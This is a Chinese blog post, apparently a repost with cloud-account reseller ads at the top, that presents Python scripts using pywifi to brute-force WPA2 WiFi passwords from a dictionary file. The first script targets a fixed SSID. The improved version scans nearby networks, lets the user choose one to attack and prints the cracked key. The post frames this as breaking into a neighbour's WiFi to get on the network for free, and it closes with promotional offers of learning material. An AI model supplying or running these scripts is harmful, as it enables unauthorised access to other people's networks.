昨晚停网后,我写了一段Python代码攻破了隔壁老王家的wifi密码
阿里云国际版折扣https://www.yundadi.com |
| 阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6 |
前言
本文给大家分享的是如何通过 Python 脚本实现 WIFI 密码的暴力攻防从而实现免费蹭网。
开发工具
Python版本 3.8
相关模块
pywifi模块
环境搭建
安装Python并添加到环境变量pip安装需要的相关模块即可。
文中密码本评论留言获取。
无图形界面
代码实现
import pywifi
from pywifi import const
import time
import datetime
# 测试连接返回链接结果
def wifiConnect(pwd):
# 抓取网卡接口
wifi = pywifi.PyWiFi()
# 获取第一个无线网卡
ifaces = wifi.interfaces()[0]
# 断开所有连接
ifaces.disconnect()
time.sleep(1)
wifistatus = ifaces.status()
if wifistatus == const.IFACE_DISCONNECTED:
# 创建WiFi连接文件
profile = pywifi.Profile()
# 要连接WiFi的名称
profile.ssid = "Tr0e"
# 网卡的开放状态
profile.auth = const.AUTH_ALG_OPEN
# wifi加密算法,一般wifi加密算法为wps
profile.akm.append(const.AKM_TYPE_WPA2PSK)
# 加密单元
profile.cipher = const.CIPHER_TYPE_CCMP
# 调用密码
profile.key = pwd
# 删除所有连接过的wifi文件
ifaces.remove_all_network_profiles()
# 设定新的连接文件
tep_profile = ifaces.add_network_profile(profile)
ifaces.connect(tep_profile)
# wifi连接时间
time.sleep(2)
if ifaces.status() == const.IFACE_CONNECTED:
return True
else:
return False
else:
print("已有wifi连接")
# 读取密码本
def readPassword():
success = False
print("****************** WIFI攻防 ******************")
# 密码本路径
path = "pwd.txt"
# 打开文件
file = open(path, "r")
start = datetime.datetime.now()
while True:
try:
pwd = file.readline()
# 去除密码的末尾换行符
pwd = pwd.strip('\n')
bool = wifiConnect(pwd)
if bool:
print("[*] 密码已攻防", pwd)
print("[*] WiFi已自动连接")
success = True
break
else:
# 跳出当前循环进行下一次循环
print("正在攻防 SSID 为 %s 的 WIFI密码当前校验的密码为%s"%("Tr0e",pwd))
except:
continue
end = datetime.datetime.now()
if(success):
print("[*] 本次破解WIFI密码一共用了多长时间{}".format(end - start))
else:
print("[*] 很遗憾未能帮你攻防出当前指定WIFI的密码请更换密码字典后重新尝试")
exit(0)
if __name__=="__main__":
readPassword()
代码运行效果
脚本优化
以上脚本需内嵌 WIFI 名、爆破字典路径缺少灵活性。下面进行改造优化
import pywifi
import time
from pywifi import const
# WiFi扫描模块
def wifi_scan():
# 初始化wifi
wifi = pywifi.PyWiFi()
# 使用第一个无线网卡
interface = wifi.interfaces()[0]
# 开始扫描
interface.scan()
for i in range(4):
time.sleep(1)
print('\r扫描可用 WiFi 中请稍后。。。' + str(3 - i), end='')
print('\r扫描完成\n' + '-' * 38)
print('\r{:4}{:6}{}'.format('编号', '信号强度', 'wifi名'))
# 扫描结果scan_results()返回一个集存放的是每个wifi对象
bss = interface.scan_results()
# 存放wifi名的集合
wifi_name_set = set()
for w in bss:
# 解决乱码问题
wifi_name_and_signal = (100 + w.signal, w.ssid.encode('raw_unicode_escape').decode('utf-8'))
wifi_name_set.add(wifi_name_and_signal)
# 存入列表并按信号排序
wifi_name_list = list(wifi_name_set)
wifi_name_list = sorted(wifi_name_list, key=lambda a: a[0], reverse=True)
num = 0
# 格式化输出
while num < len(wifi_name_list):
print('\r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1]))
num += 1
print('-' * 38)
# 返回wifi列表
return wifi_name_list
# WIFI攻防模块
def wifi_password_crack(wifi_name):
# 字典路径
wifi_dic_path = input("请输入本地用于WIFI暴力攻防的密码字典txt格式每个密码占据1行的路径")
with open(wifi_dic_path, 'r') as f:
# 遍历密码
for pwd in f:
# 去除密码的末尾换行符
pwd = pwd.strip('\n')
# 创建wifi对象
wifi = pywifi.PyWiFi()
# 创建网卡对象为第一个wifi网卡
interface = wifi.interfaces()[0]
# 断开所有wifi连接
interface.disconnect()
# 等待其断开
while interface.status() == 4:
# 当其处于连接状态时利用循环等待其断开
pass
# 创建连接文件对象
profile = pywifi.Profile()
# wifi名称
profile.ssid = wifi_name
# 需要认证
profile.auth = const.AUTH_ALG_OPEN
# wifi默认加密算法
profile.akm.append(const.AKM_TYPE_WPA2PSK)
profile.cipher = const.CIPHER_TYPE_CCMP
# wifi密码
profile.key = pwd
# 删除所有wifi连接文件
interface.remove_all_network_profiles()
# 设置新的wifi连接文件
tmp_profile = interface.add_network_profile(profile)
# 开始尝试连接
interface.connect(tmp_profile)
start_time = time.time()
while time.time() - start_time < 1.5:
# 接口状态为4代表连接成功当尝试时间大于1.5秒之后则为错误密码经测试测正确密码一般都在1.5秒内连接若要提高准确性可以设置为2s或以上相应暴力攻防速度就会变慢
if interface.status() == 4:
print(f'\r连接成功密码为{pwd}')
exit(0)
else:
print(f'\r正在利用密码 {pwd} 尝试攻防。', end='')
# 主函数
def main():
# 退出标致
exit_flag = 0
# 目标编号
target_num = -1
while not exit_flag:
try:
print('WiFi万能钥匙'.center(35, '-'))
# 调用扫描模块返回一个排序后的wifi列表
wifi_list = wifi_scan()
# 让用户选择要攻防的wifi编号并对用户输入的编号进行判断和异常处理
choose_exit_flag = 0
while not choose_exit_flag:
try:
target_num = int(input('请选择你要尝试攻防的wifi'))
# 如果要选择的wifi编号在列表内继续二次判断否则重新输入
if target_num in range(len(wifi_list)):
# 二次确认
while not choose_exit_flag:
try:
choose = str(input(f'你选择要攻防的WiFi名称是{wifi_list[target_num][1]}确定吗Y/N'))
# 对用户输入进行小写处理并判断
if choose.lower() == 'y':
choose_exit_flag = 1
elif choose.lower() == 'n':
break
# 处理用户其它字母输入
else:
print('只能输入 Y/N 哦o(* ̄︶ ̄*)o')
# 处理用户非字母输入
except ValueError:
print('只能输入 Y/N 哦o(* ̄︶ ̄*)o')
# 退出攻防
if choose_exit_flag == 1:
break
else:
print('请重新输入哦(*^▽^*)')
except ValueError:
print('只能输入数字哦o(* ̄︶ ̄*)o')
# 密码攻防传入用户选择的wifi名称
wifi_password_crack(wifi_list[target_num][1])
print('-' * 38)
exit_flag = 1
except Exception as e:
print(e)
raise e
if __name__ == '__main__':
main()
脚本运行效果如下
上述代码实现了依据信号强度枚举当前附近的所有 WIFI 名称并且可供用户自主选择需要暴力攻防的 WIFI
同时还可灵活指定暴力攻防的字典相对而言体验感提升了不少。进一步也可以将上述脚本打包生成 exe 文件双击运行效果如下
最后
为了感谢读者们我想把我最近收藏的一些编程干货分享给大家回馈每一个读者希望能帮到你们。
里面有适合小白新手的全套资料给到大家~
快来和小鱼一起成长进步吧
① 100+多本Python电子书主流和经典的书籍应该都有了
② Python标准库资料最全中文版
③ 爬虫项目源码四五十个有趣且经典的练手项目及源码
④ Python基础入门、爬虫、web开发、大数据分析方面的视频适合小白学习
⑤ Python学习路线图告别不入流的学习
